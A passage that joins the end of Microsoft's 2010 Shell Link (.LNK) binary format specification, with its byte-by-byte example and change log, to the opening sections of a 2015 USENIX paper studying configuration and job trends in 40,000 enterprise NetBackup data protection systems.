Data: (68 bytes, offset 0x007D), <68 bytes of data> [test]  
ItemIDSize : (2 bytes, offset 0x00C1), 0x0048  
Data: (68 bytes, offset 0x00C3), <70 bytes of data> [a.txt]  
TerminalID : (2 bytes, offset 0x0109), 0x0000 indicates the end of the IDList . 
Because HasLinkInfo  is set, a LinkInfo  structure (section 2.3) follows:  
LinkInfoSize : (4 bytes, offset 0x010B), 0x0000003C  
LinkInfoHeaderSize : (4 bytes, offset 0x010F), 0x0000001C as specified in the LinkInfo 
structure definition.  
LinkInfoFlags : (4 bytes, offset 0x0113), 0x00000001 VolumeIDAndLocalBasePath  is set.  
VolumeIDOffset : (4 bytes, offset 0x0117), 0x0000001C, references offset 0x0127.  
LocalBasePathOffset : (4 bytes, offset 0x011B), 0x0000002D, references the character string 
"C:\test\a.txt".  
CommonNetworkRelativeLinkOffset : (4 bytes, offset 0x011F), 0x00000000 indicates 
CommonNetworkR elativeLink  is not present.  
CommonPathSuffixOffset : (4 bytes, offset 0x0123), 0x0000003B, references offset 
0x00000146, the character string "" (empty string).  
VolumeID : (17 bytes, offset 0x0127), because VolumeIDAndLocalBasePath  is set, a 
VolumeID  structure (section 2.3.1 ) follows:  
VolumeIDSize : (4 bytes, offset 0x0127), 0x00000011 indicates the size of the VolumeID  
structure.  
DriveType : (4 bytes, offset 0 x012B), DRIVE_FIXED(3).  
DriveSerialNumber : (4 bytes, offset 0x012F), 0x307A8A81.  
VolumeLabelOffset : (4 bytes, offset 0x0133), 0x00000010, indicates that Volume Label 
Offset Unicode is not specified and references offset 0x0137 where the Volume Label is sto red. 
Data: (1 byte, offset 0x0137), "" an empty character string.  
LocalBasePath : (14 bytes, offset 0x0138), because VolumeIDAndLocalBasePath  is set, the 
character string "c: \test\a.txt" is present.  
 
47 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  CommonBasePath : (1 byte, offset 0x0146), "" an empty chara cter string.  
Because HasRelativePath  is set, the RELATIVE_PATH  StringData  structure (section 2.4) follows:  
CountCharacters : (2 bytes, offset 0x0147), 0x0007 Unicode characters.  
String  (14 bytes, offset 0x0149), the Unicode string: ". \a.txt".  
Because HasWorkingDir  is set, the WORKING_DIR  StringData structure (section 2.4) follows: 
CountCharacters : (2 bytes, offset 0x0157), 0x0007 Unicode characters.  
String  (14 bytes, offset 0x0159), the Unicode string: "c: \test".  
Extra data section: (100 bytes, offset 0x0167), an ExtraData  structure (section 2.5) follows:  
ExtraDataBlock  (96 bytes, offset 0x0167), the TrackerDataBlock  structure (section 2.5.10 ) 
follows:  
BlockSize : (4 bytes, offset 0x0167), 0x00000060  
BlockSignature : (4 bytes, offset 0x016B), 0xA000003, which identifies the TrackerDataBlock 
structure (section 2.5.10 ). 
Length : (4 by tes, offset 0x016F), 0x00000058, the required minimum size of this extra data 
block.  
Version : (4 bytes, offset 0x0173), 0x00000000, the required version.  
MachineID : (16 bytes, offset 0x0177), the character string "chris -xps", with zero fill.  
Droid : (32 bytes, offset 0x0187), 2 GUID values.  
DroidBirth : (32 bytes, offset 0x01A7), 2 GUID values.  
TerminalBlock : (4 bytes, offset 0x01C7), 0x00000000 indicates the end of the extra data 
section.  
 
48 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  4   Security  
None.  
 
49 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  5   Appendix A: Product Behavior  
The information in this specification is applicable to the following Microsoft products:  
Microsoft  Windows  NT® 3.1 operating system  
Microsoft Windows  NT® 3.5 operating system  
Microsoft Windows  NT® 3.51 operating system  
Microsoft Windows  NT® 4.0 operating system  
Microsoft Windows®  2000 operating system  
Windows®  XP operating system  
Windows Server®  2003 operating system  
Windows  Vista® operating system  
Windows Server®  2008 operating system  
Windows®  7 operating system  
Windows  Server®  2008 R2 operating system  
Exceptions, if any, are noted below. If a service pack number appears with the product version, 
behavior changed in that service pack. The new behavior also applies to subsequent service packs of 
the product unless otherwi se specified.  
Unless otherwise specified, any statement of optional behavior in this specification prescribed using 
the terms SHOULD or SHOULD NOT implies product behavior in accordance with the SHOULD or 
SHOULD NOT prescription. Unless otherwise specified , the term MAY implies that product does not 
follow the prescription.  
<1> Section 2.3: In Windows, Unicode characters are stored in this structure if the data cannot be 
represented as ANSI  characters due to truncation of the values. In this case, the value of the 
LinkInfoHeaderSize  field is greater than or equal to 36.  
<2> Section 2.5.1: In Windows environments, this is commonly known as a "command prompt" 
window.  
<3> Section 2.5.2: In Windows environments, this is commonly known as a "command prompt" 
window.  
<4> Section 2.5.3: In Windows, this is a Windows Installer (MSI) application descriptor. For more 
information, see [MSDN -MSISHORTCUTS] . 
<5> Section 2.5.11: The VistaAndAboveIDListDataBlock structure is supported on Windows  Vista, 
Windows Server  2008, Windows  7, and Windows Server  2008 R2 only.  
 
50 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  6   Change Tracking  
This section identifies changes made to [MS -SHLLINK] protocol documentation between April 2010 
and June 2010 releases. Changes are classed as major, minor, or editorial.  
Major  changes affect protocol interoperability or implementation. Examples of major changes are:          
A document revision that incorporates changes to interoperability requirements or functionality.  
An extensive rewrite, addition, or deletion of major porti ons of content.  
A protocol is deprecated.  
The removal of a document from the documentation set.  
Changes made for template compliance.  
Minor  changes do not affect protocol interoperability or implementation. Examples are updates to 
fix technical accuracy or  ambiguity at the sentence, paragraph, or table level.          
Editorial  changes apply to grammatical, formatting, and style issues.          
No changes  means that the document is identical to its last release.          
Major and minor changes can be desc ribed further using the following revision types:  
New content added.  
Content update.  
Content removed.  
New product behavior note added.  
Product behavior note updated.  
Product behavior note removed.  
New protocol syntax added.  
Protocol syntax updated.  
Protoco l syntax removed.  
New content added due to protocol revision.  
Content updated due to protocol revision.  
Content removed due to protocol revision.  
New protocol syntax added due to protocol revision.  
Protocol syntax updated due to protocol revision.  
Protocol  syntax removed due to protocol revision.  
New content added for template compliance.  
Content updated for template compliance.  
 
51 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Content removed for template compliance.  
Obsolete document removed.  
Editorial changes always have the revision type "Editorially updated."  
Some important terms used in revision type descriptions are defined as follows:  
Protocol syntax  refers to data elements (such as packets, structures, enumerations, and methods) 
as well as interfaces.  
Protocol revision  refers to changes made to a protocol that affect the bits that are sent over the 
wire. 
Changes are listed in the following table. If you need further information, please contact 
protocol@microsoft.com . 
Section  Tracking number (if 
applicable)  
 and description  Major  
change  
(Y or 
N) Revision Type  
2.3 
LinkInfo  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
2.3.1 
VolumeID  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
2.3.2 
CommonNetworkRelativeLink  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
2.4 
StringData  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
2.5.3 
DarwinDataBlock  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
2.5.4 
EnvironmentVar iableDataBlock  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
2.5.5 
IconEnvironmentDataBlock  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
2.5.10  
TrackerDataBlock  Replaced the term "ANSI" with 
"system default co de page".  N Editorially updated.  
3.1 
Shortcut to a File  Replaced the term "ANSI" with 
"system default code page".  N Editorially updated.  
4 
Security  Added section.  N New content added for 
template compliance.  
 
52 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  7   Index  
A 
Applicability  7 
C 
Change tracking  50 
CommonNetworkRelativeLink packet  23 
ConsoleDataBlock packet  29 
ConsoleFEDataBlock packet  33 
D 
DarwinDataBlock packet  34 
E 
EnvironmentVariableDataBlock packet  35 
Example - shortcut to file  44 
ExtraData packet  27 
F 
Fields - vendor -extensible  7 
FileAttributeFlags packet  12 
G 
Glossary  4 
H 
HotKeyFlags packet  13 
I 
IconEnvironmentDataBlock packet  37 
IDList packet  17 
Informative references  5 
Introduction  4 
ItemID packet  18 
K 
KnownFolderDataBlock packet  38 
L 
LinkFlags packet  10 
LinkInfo packet  18 
LinkTargetIDList packet  17 
Localization  7 
N 
Normative references  5 
O Overview (synopsis)  6 
P 
Product behavior  49 
PropertyStoreDataBlock packet  39 
R 
References  
informative  5 
normative  5 
Relationsh ip to protocols and other structures  6 
S 
Security  48 
ShelllLinkHeader packet  8 
ShimDataBlock packet  39 
Shortcut to file example  44 
SpecialFolderDataBlock packet  40 
StringData packet  26 
Structures  8 
T 
TrackerDataBlock packet  40 
Tracking changes  50 
V 
Vendor -extensible fields  7 
Versioning  7 
VistaAndAboveIDListDataBlock packet  42 
VolumeID packet  21 This paper is included in the Proceedings of the 
2015 USENIX Annual Technical Conference (USENIC ATC ’15).
July 8–10, 2015 • Santa Clara, CA, USA
ISBN 978-1-931971-225
Open access to the Proceedings of the 
2015 USENIX Annual Technical Conference 
(USENIX ATC ’15) is sponsored by USENIX.Identifying Trends in Enterprise Data  
Protection Systems
George Amvrosiadis, University of Toronto;  Medha Bhadkamkar, Symantec Research Labs
https://www.usenix.org/conference/atc15/technical-session/presentation/amvrosiadis
USENIX Association  2015 USENIX Annual Technical Conference 151Identifying Trends in Enterprise Data Protection Systems
George Amvrosiadis
Dept. of Computer Science, University of Toronto
gamvrosi@cs.toronto.eduMedha Bhadkamkar
Symantec Research Labs
medha bhadkamkar@symantec.com
Abstract
Enterprises routinely use data protection techniques to
achieve business continuity in the event of failures. Toensure that backup and recovery goals are met in the
face of the steep data growth rates of modern workloads,
data protection systems need to constantly evolve. Re-
cent studies show that these systems routinely miss theirgoals today. However, there is little work in the literature
to understand why this is the case.
In this paper, we present a study of 40,000 enterprise
data protection systems deploying Symantec NetBackup,a commercial backup product. In total, we analyze over
a million weekly reports which have been collected over
a period of three years. We discover that the main rea-
son behind inefficiencies in data protection systems is
misconfigurations. Furthermore, our analysis shows thatthese systems grow in bursts, leaving clients unprotected
at times, and are often configured using the default pa-
rameter values. As a result, we believe there is poten-
tial in developing automated, self-healing data protection
systems that achieve higher efficiency standards. To aid
researchers in the development of such systems, we useour dataset to identify trends characterizing data protec-
tion systems with regards to configuration, job schedul-
ing, and data growth.
1 Introduction
Studies analyzing the characteristics of storage systemsare an important aid in the design and implementation of
techniques that can improve the performance and robust-
ness of these systems. In the past 30 years, numerous
file system studies have investigated different aspects ofdesktop and enterprise systems [2, 6, 7, 19, 30, 39, 47,51, 55, 56]. However, little work has been published
to provide insight in the characteristics of backup sys-
tems, focusing on deduplication rates [52], and the char-
acteristics of the file systems storing the backup images[66]. With this study, we look into the backup applica-tion generating these images, their internal structure, andthe characteristics of the jobs that created them.
Modern data growth rates and shorter recovery win-dows are driving the need for innovation in the area ofdata protection. Recent surveys of CIOs and IT profes-sionals indicate that 90% of businesses use more than
two backup products [18], and only 28% of backup jobs
complete within their scheduled window [34, 65]. Thegoal of this study is to investigate how data protectionsystems are configured and operate. Our analysis shows
that the inefficiency of backup systems is largely at-
tributed to misconfigurations. We believe automating
configuration management can help alleviate these con-
figuration issues significantly. Our findings motivate and
support research on automated data protection [22, 27],by identifying trends in data protection systems, and re-
lated directions for future research.
Our study is based on a million weekly reports col-
lected in a span of three years, from 40, 000 enterprise
backup systems, also referred to as domains in the rest
of the paper. Each domain is a multi-tiered network of
backup servers deploying Symantec NetBackup [61], anenterprise backup product. To the best of our knowledge,
this dataset is the largest in existing literature in terms of
both the number of domains, and the time span covered.As a result, we are able to analyze the characteristics of
a diverse domain population, and its evolution over time.
First, we investigate how backup domains are config-
ured. Identifying common growth trends is useful for
provisioning system resources, such as network or stor-age bandwidth, to accommodate future growth. We find
that the population of protected client machines grows
in bursts and rarely shrinks. Furthermore, domains pro-
tect data of a single type, such as database files or virtual
machines, regardless of domain size. Overall, our find-ings suggest that automated configuration is an importantand feasible direction for future research to accommo-
date growth bursts in the number of protected clients.
The configuration of a backup system, with regards to
job frequency and scheduling, is also an important con-
tributor to resource consumption. Understanding com-
mon practices employed by systems in the field can give
us better insight in the load that these systems face, and
the characteristics of that load. To derive these trends, weanalyzed 210 million jobs performing a variety of tasks,ranging from data backup and recovery, to management
152 2015 USENIX Annual Technical Conference USENIX AssociationCharacteristic Observation Section Previous work
System setup The initial configuration period of backup domains is at least 3 weeks. 4.1 None
Protected clients Clients tend to be added to a domain in groups, on a monthly basis. 4.2 None
Backup policies82% of backup domains protect one type of data. 4.3 None
The number of backup job policies in a domain remains mostly fixed. Also, 79% of
clients subscribe to a single policy.4.4 None
Job frequencyFull backups tend to occur every few days, while incremental ones occur daily.Recovery operations occur for few domains, on a weekly or monthly basis.5.2 None
Users prefer default scheduling windows during weekdays, resulting in nightly bursts of
activity.5.3 None
Job sizesIncremental and full backups tend to be similar to each other in terms of size andnumber of files. Recovery jobs restore either few files and bytes, or entire volumes.6.1Considers filesizes instead [66]
Deduplicationratios Deduplication can result in the reduction of backup image sizes by more than 88%,despite average job sizes ranging in the tens of gigabytes.6.2We confirm theirfindings [66]
Data retentionIncremental backups are retained for weeks, while full backups are retained for monthsand retention depends on their scheduling frequency.6.3We confirm theirfindings [66]
Table 1: A summary of the most important observations of our study.
of backup archives. We find that jobs occur in bursts,
due to the preference of default scheduling parameters by
users. Moreover, job types are strongly correlated to spe-
cific days and times of the week. To avoid these bursts
of activity, we expect future backup systems to followmore flexible scheduling plans based on data protection
guarantees and resource availability [4, 26, 48].
Finally, successful resource provisioning for backup
storage capacity requires data growth rate knowledge.
Our results show that jobs in the order of tens of GBs arethe norm, even with deduplication ratios of 88%. Also,
retention periods for these jobs are selected as a function
of backup frequency, and backups are performed at inter-vals significantly shorter than the periods for which they
are retained. Thus, future data protection offering faster
backup and recovery times through the use of snapshots[1, 22], will have to be designed to handle significant data
churn, or employ these mechanisms selectively.
We summarize the most important observations of our
study in Table 1. Note that a policy (see Section 2.2)
refers to a predefined set of configuration parameters spe-
cific to an application. The rest of the paper is organizedas follows. In Section 2, we provide an overview of the
evolution of backup systems. Section 3 describes the
dataset used in this study. Sections 4 through 6 presentour analysis results on backup domain configuration, job
scheduling, and data growth, respectively. Finally, we
discuss directions for research on next-generation data
protection systems, supported by our findings, in Section
7, and conclude in Section 8.
2 Background
Formally, backup is the process of making redundant
copies of data, so that it can be retrieved if the orig-inal copy becomes unavailable. In the past 30 years,
however, data growth coupled with capacity and band-width limitations have triggered a number of paradigm
shifts in the way backup is performed. Recently, data
growth trends have once again prompted efforts to re-think backup [1, 9, 20, 22, 27]. This section underlines
the importance of field studies in this process (Section
2.1), putting our study in context, and describes the ar-chitecture of modern backup systems (Section 2.2).
2.1 Evolution of backup and field studies
In the early 1990s, backup consisted of using simplecommand-line tools to copy data to/from tape. A number
of studies tested and outlined the shortcomings of these
contemporary backup methods [38, 54, 69, 70]. The lim-
itations of this approach, which included scaling, archive
management, operating on online systems, and comple-
tion time, were subsequently addressed sufficiently bymoving to a client-server backup model [8, 11, 15, 16].
In this model, job scheduling, policy configuration, and
archive cataloging were all unified at the server side.
In the early 2000s, deduplicating storage systems were
developed [53, 67], which removed data redundancy,
lowering the cost of backup storage. Subsequently, Wal-lace et al. [66] published a study that aims to characterizebackup storage characteristics by looking at the contentsand workload of file systems that store images producedby backup applications such as NetBackup. A large
body of work used their results to simulate deduplicating
backup systems more realistically [41, 43, 44, 57, 62],and was built on the motivation provided by the study’sresults [40, 42, 46, 58]. The authors analyze weekly re-ports from appliances, while we analyze reports from
the backup application, which has visibility within the
archives and the jobs that created them. However, the
two studies overlap in three points. First, the dedupli-cation ratios reported for backups confirm our findings.Second, we report backup data retention as a configura-tion parameter, while they report on file age, two distri-
USENIX Association  2015 USENIX Annual Technical Conference 153
Master server
Storage serversmedia management,
job scheduling,
backup policies,
catalog metadata
data managementTier One Tier Two
ClientsTier Three
(a) 3-tier architecture
Fast storage
interfaceBackup storage
Master   server
data/media management,
job scheduling,
backup policies,
catalog metadata
ClientsTier One Tier Two
 (b) 2-tier architecture
Figure 1: Architecture of a modern backup domain.
butions that overlap for popular values. Third, the aver-
age job sizes we report are 5-8 times smaller than the file
sizes reported in their study, likely because they take into
account all files in the file system storing the backup im-
ages. Overlaps between our study and previous work are
summarized in Table 1.
Recently, an ongoing effort has been initiated in the
industry to redefine enterprise data protection as a re-sponse to modern data growth rates and shorter backup
windows [12, 18, 65]. Proposed deviations from the tra-ditional model rely on data snapshots, trading manage-
ment complexity for faster job completion rates [22], and
a paradigm shift from backup to data protection policies,
in which users specify constraints on data availability as
opposed to backup frequency and scheduling [1]. The
latter paradigm allows the system to make decisions onindividual policy parameters that can increase global ef-ficiency, while keeping misconfigurations to a minimum.
In this direction, previous work leverages predictive an-
alytics to configure backup systems [9, 20, 25]. We be-
lieve that all this work is promising, and that a study char-acterizing the configuration and evolution of backup sys-tems over time could aid in developing new approaches
and predictive models that ensure backup systems meet
their goals timely, while efficiently utilizing their re-
sources.
2.2 Anatomy of modern backup systems
Modern backup domains typically consist of three tiers
of operation: a master server, one or more storage
servers, and several clients, as shown in Figure 1a. The
domain’s master server maintains information on backupimages and backup policies. It is also responsible for
scheduling and monitoring backup jobs, and assigningthem to storage servers. Storage servers manage stor-
age media, such as tapes and hard drives, used to archivebackup images. By abstracting storage media manage-
ment in this way, clients can send data directly to their
corresponding storage server, avoiding a bandwidth bot-tleneck at the master server. Finally, domain clients
can be desktops, servers, or virtual machines generatingdata that is protected by the backup system against fail-
ures. In an alternative 2-tiered architecture model (Fig-
ure 1b), the storage servers are absent and the storagemedia are directly managed by the master server. Themajority of enterprise backup software today, includ-ing Symantec NetBackup, support the 3-tiered model[3, 5, 13, 17, 21, 28, 32, 60, 68].
Performing a backup generally consists of a sequence
of operations, each of which is executed as an indepen-dent job. Such jobs include: snapshots of the state of
data at a given point in time, copying data into a backup
image as part of a full backup, copying modified data
since the last backup as part of an incremental backup,
restoring data from a backup image as part of a recov-
ery operation, and managing backup images or backing
up the domain’s configuration as part of a management
operation. These jobs are typically employed in a prede-
fined order. For example, a full backup may be followed
by a management operation that deletes backup imagespast their retention periods.
To be consistently backed up, or provide point-in-time
recovery guarantees, business applications may requirespecific operations to take place. In these scenarios,backup products offer predefined policies that are spe-
cific to individual applications. For instance, a Microsoft
Exchange Server policy will also backup the transaction
log, to capture any updates since the backup was initi-ated. Users can further configure policies to specify the
characteristics of backups jobs, such as their frequency
and retention rate.
3 Dataset Information
Our analysis is based on telemetry reports collected from
customer installations of a commercial backup product,Symantec NetBackup [61], in enterprise and regular pro-
duction environments. Reports are only collected from
customers who opted to participate in the telemetry pro-
gram, so our dataset represents a fraction of the customer
base. The reports contain no personal identifiable infor-mation, or details about the data being backed up.
Report types. Each report in our dataset belongs to ex-
actly one of three types: installation, runtime, or domain
report. Reports of different types are collected at distinctpoints in the lifetime of a backup domain. Installation
154 2015 USENIX Annual Technical Conference USENIX AssociationReport type Metrics used in study
Installation Installation time
Runtime reportJob information: starting time, type, size,
number of files, client policy, deduplication
ratio, retention period
Domain reportNumber and type of policies, number of
clients, number of storage media, number of
storage servers and appliances
Table 2: Telemetry report metrics used in the study.
reports are generated when the backup software is suc-
cessfully installed on a server, and can be used to de-
termine the time each server of a domain first came on-line. Runtime reports are generated and transmitted on
a weekly basis from online domains, and contain dailyaggregate data about the backup jobs running on the sys-
tem. Domain reports are also generated and transmitted
on a weekly basis, and report daily aggregate metrics that
describe the configuration of the backup domain. The
telemetry report metrics used in this study are summa-
rized in Table 2.
Dataset size. The telemetry reports in our dataset were
collected over the span of 3 years (January 2012 to De-
cember 2014), across two major versions of the Net-Backup software. We collected 1 million reports from
over 40,000 server installations deployed in 124 coun-
tries, on most modern operating systems.
Monitoring duration. The backup domains included
in our study were each monitored for 5.5 months on av-
erage, and up to 32 months. We elaborate on our strategy
for excluding some of the domains from our analysis in
Section 4.1. Note that the monitoring time is not always
equivalent to the total lifetime of the domain, as many ofthese domains were still online at the time of this writing.
Architecture. While NetBackup supports the 3-tiered
architecture model, only 35% of domains in our dataset
use dedicated storage servers. The remaining domains
omit that layer, opting for a 2-tier system instead. Ad-ditionally, while backup software can be installed onany server, storage companies also offer Purpose-BuiltBackup Appliances (PBBAs) [33]. 31% of domains
in our dataset represent this market by deploying Net-
Backup on Symantec PBBAs.
4 Domain configuration
This section analyzes the way backup domains are con-figured with regards to their clients and backup policies.
We use the periodic telemetry reports to quantify the
growth rate of the number of clients and policies across
domains, and characterize the diversity of policy typesbased on the type of data and applications they protect.0.00.10.20.30.40.50.60.70.80.91.0
1 2 3 4 5 6 7 8 9 10 11 12
Week of operationFraction of expected totalClients
PoliciesStorage mediaStart of
analysis
Figure 2: The average number of clients, policies, and
storage media for a given week of operation, as a fractionof the expected total, i.e. the overall mean. We beginour analysis on the fourth week of operation, when these
quantities become relatively stable.
4.1 Initial configuration period
Observation 1: Backup domains take at least 3 weeks
to reach a stable configuration after installation.
The number of clients, policies, and storage media are
three characteristic factors of a backup domain’s config-
uration. These numbers fluctuate as resources are addedto, or removed from the domain. As we monitor domains
since their creation, we find the number of clients, poli-
cies, and storage media to be initially close to zero, and
then increase rapidly until the domain is properly config-
ured. After this initial configuration period, variability
for these numbers tends to be low over the lifetime ofeach domain, with standard deviations less than 16% of
the corresponding mean.
To avoid having the initial weeks of operation affect
our results, we exclude them from our analysis. To esti-mate the average configuration period length, we analyze
the number of clients, policies, and storage media in abackup domain as a fraction of the overall mean, i.e. the
expected total. In Figure 2, we report the average frac-
tions for all domains that have been monitored for more
than 16 weeks. For example, a fraction of 0.47 for the
number of clients during the first week of operation, im-plies that the number of clients at that time is 47% of the
domain’s expected total. With the exception of storage
media, which seem to be added to backup domains fromtheir first week of operation, we find that the number of
clients and policies tends to be significantly lower for the
first 3 weeks of operation. As a result, we choose to start
our analysis from the fourth week of operation.
4.2 Client growth rate
Observation 2: The number of clients in a domain in-
creases by an average of 7 clients every 3.7 months.
Clients are the producers of backup data, and the con-
USENIX Association  2015 USENIX Annual Technical Conference 155012345678910
Percentage of domains0102030405060708090100
0 3 6 9 12 15 18 21 24 27 30 33
Average rate of change in clients (months)Cum. percentage of domainsHistogram (right y−axis)
CDF (left y−axis)Median: 1.3 monthsMean: 3.7 months47%
Figure 3: Distribution of the average rate at which the
number of clients changes, across all domains in ourdataset. On average, 93% of client population changes
are attributed to the addition of clients.
sumers of said data during recovery. As a result, the num-
ber of jobs running on a backup domain is directly pro-
portional to the number of clients in the domain, deeming
it important to quantify the rate at which their population
grows over time.
Once the initial configuration period for a backup do-
main has elapsed, we find that clients tend to be addedto, or removed from the domain in groups. Therefore,
we characterize a domain’s client population growth by
quantifying the average rate of change in the client pop-ulation, the sign indicating an increase or decrease in the
population, and size of each change.
To estimate the rate at which the number of clients
change, we extract inter-arrival times between changes
through change-point analysis [37], a cost-benefit ap-
proach for detecting changes in time series. Then, we
estimate the average rate of change for a domain as the
average of these inter-arrival times. In Figure 3, we showthe distribution of the average rates of change, i.e. the av-
erage number of months between changes in the number
of clients across domains. For 42% of backup domains,
the number of clients remains fixed after the first 3 weeks
of operation, while on average the number of clients in
a domain changes every 3.7 months. Overall, we find
no strong correlation between the rate of change in thenumber of clients, and the domain’s lifetime.
We further analyze the sign and size of each popula-
tion change. Of all events in which a domain’s clientpopulation changes, 93% are attributed to the addition of
clients. However, 78% of domains never remove clients.
Regarding the size of each change, Figure 4 shows thedistribution of the average number of clients involved in
each change, across all domains in our study. On av-
erage, a domain’s population changes by 7.3 clients ata time. The average standard deviation of the number
of clients over time is 13.1% of the corresponding ex-
pected value, indicating low variation overall. However,
the 95% confidence intervals (C.I.) for each mean (Fig-
ure 4), suggest that growth spurts as large as 2.16 times0102030405060708090100
1 2 4 8 16 32 64 128 256 512
Average size of change in the number of clientsCum. percentage of domainsCDF
95% C.I.Median: 3.0 clientsMean: 7.3 clientsC.I. range
Figure 4: Distribution of the average number of clients
involved in each change of a domain’s client population,across all domains in our dataset. The 95% confidenceintervals (C.I.) for each domain’s average are also shown.
Policy category Domains with at least 1 policy
File and block policy 61.24%
Database policy 20.34%
Virtual machine policy 15.13%
Application policy 13.52%
Metadata backup policy 31.93%
Table 3: Percentage of backup domains with at least onepolicy of a given category. Less than a third of domains
protect the master server using a metadata backup policy.
the average value are possible, as this is the width of the
average 95% confidence interval.
4.3 Diversity of protected data
Observation 3: 82% of backup domains protect one
type of data, and only 32% of domains effectively protect
the master server’s state and metadata.
To provide consistent online backups, backup prod-
ucts offer optimizations for different application types,
implemented as dedicated policy types [14, 23, 59]. Forour analysis, we partitioned these policy types into fourcategories. File and block policies are specifically tai-
lored for backing up raw device data blocks, or file andoperating system data and metadata, e.g. from NTFS,AFS, or Windows volumes. Database policies are de-
signed to provide consistent online backups for specificdatabase management systems, such as DB2 and Oracle.
Virtual machine policies are tuned to backup and restore
VM images, from virtual environments such as VMware
or Hyper-V . Application policies specialize in backing up
state for client-server applications, such as Microsoft Ex-change and Lotus Notes. Finally, a metadata backup pol-
icycan be setup to backup the master server’s state.
In Table 3, we show the probability that at least one
policy of a given category will be present in a backup do-
main. Since domains may deploy policies from multiple
categories, these percentages add up to more than 100%.
156 2015 USENIX Annual Technical Conference USENIX Association0102030405060708090100Percentage of domains
One Two Three Four
Number of policy categories82.21%
15.82%
1.72% 0.26%
Figure 5: Distribution of the number of policy categories
per backup domain. The metadata backup policy cate-gory is not accounted for in these numbers.
05101520253035404550
Percentage of domains0102030405060708090100
12 4 6 8 10 12 14 16 18 20 22
Number of policy types per domainCum. percentage of domainsHistogram (right y−axis)
CDF (left y−axis)Median: 1.9 policy typesMean: 2.6 policy types
Figure 6: Distribution of the number of policy types per
backup domain, across all domains in the study. More
than 25 distinct NetBackup policy types are present in
the telemetry data.
Surprisingly, we find that only 32% of backup domains
register a metadata backup policy to protect the master
server’s data. While the remaining domains may employ
a different mechanism to backup the master server, guar-anteeing no data inconsistencies while doing so is chal-
lenging. In any case, this result suggests that automat-
ically configured metadata backup policies should be apriority for future backup systems.
We also look into the number of policy categories rep-
resented by each domain’s policies, to gauge the diver-sity in the types of protected data. Interestingly, Figure5 shows that 82% of domains deploy policies of a singlecategory (excluding metadata backup policies), and theremaining domains mostly use policies of two distinct
categories. We further examine the number of distinct
policy types that are deployed in each domain. As shownin Figure 6, domains tend to make use of a small numberof policy types. Specifically, 61% of the domains deploypolicies of only one, or two distinct types.
4.4 Backup policies
Observation 4: After the initial configuration period,
the number of policies in a domain remains mostly fixedand 79% of clients subscribe to a single policy each.0102030405060708090100
1 2 4 8 16 32 64 128 256 512 1024
Average number of policies per domainCum. percentage of domainsCDF
95% C.I.
Median: 7.0 policies
Mean: 30.1 policies
Figure 7: Distribution of the average number of policies
per backup domain. The 95% confidence intervals foreach average are also shown. Overall, the number ofpolicies remains stable over the lifetime of a domain.
Following from Section 4.2, the policies in a backup
domain, along with the number of clients, are indica-tive of the domain’s load. Recall from Section 2.2, thatclients subscribe to policies which determine the char-
acteristics of backup jobs. Therefore, it is important to
quantify both the number of policies in a domain and
the characteristics of each, to effectively characterize thedomain’s workload. We defer an analysis of job charac-
teristics to the remainder of the paper, and focus here on
the number of policies in each domain.
In Figure 7, we show the distribution of the average
number of policies in a given backup domain, across
all domains in our dataset. Overall, we find that once
the initial configuration period is complete, the numberof backup policies in a domain remains mostly stable.
Specifically, the expected width of the 95% confidence
interval is 2.5% of the average number of policies.
Figure 7 also shows that the average backup domain
carries 30 backup policies, while 5% of domains carry
over 128. While each policy may represent a group of
clients with specific data protection needs, we find that
individual clients usually subscribe to a single policy. In
Figure 8, we show the distribution of the average number
of policies that each client subscribes to. More than 79%of clients belong to only one policy, while 16% spendsome or most of their time unprotected (less than one
policy on average). The latter result, coupled with the
large number of policies in backup domains and the fact
that clients are added to a domain in groups (Section 4.2),suggests that manual policy configuration might not beideal as a domain’s client population inflates over time.
5 Job scheduling
While the master server can reorder policy jobs to in-crease overall system efficiency, it adheres to user pref-erences that dictate when, and how often a job should be
scheduled. This section looks into the way that these pa-
USENIX Association  2015 USENIX Annual Technical Conference 157012345678910
Percentage of domains0102030405060708090100
0 2 4 6 8 10 12 14 16 18 20 22 24
Policies per clientCum. percentage of domainsHistogram (right y−axis)
CDF (left y−axis)Median: 1.0 policiesMean: 1.2 policies96.5%
Figure 8: Distribution of the average number of poli-
cies that a domain client subscribes to. Overall, 79% ofclients subscribe to one policy, while 16% spend some or
most time unprotected by a policy (x <1).
Job type Percentage of jobs
Incremental Backups 45.27%
Full Backups 31.20%
Snapshot Operations 12.61%
Management Operations 10.12%
Recovery Operations 0.80%
Table 4: Breakdown of all jobs in the dataset by type.
rameters are configured by users across backup domains,
and the workload generated in the domain as a result.
5.1 Job types
Recall from Section 2.2 that policies consist of a prede-fined series of operations, each carried out by a separate
job. We collected data from 209.5 million jobs, and we
group them in five distinct categories: full and incremen-tal backups, snapshots, recovery, and management oper-
ations. In Table 4, we show a breakdown of all jobs in
our dataset by job type. Across all monitored backup do-mains, we find that 76% of jobs perform data backups,
having processed a total of 1.64 Exabytes of data, while
13% of jobs take snapshots of data. On the other hand,less than 1% of jobs are tasked with data recovery, hav-
ing restored a total of 5.12 Petabytes of data. Finally,
10% of jobs are used to manage backup images, e.g. mi-
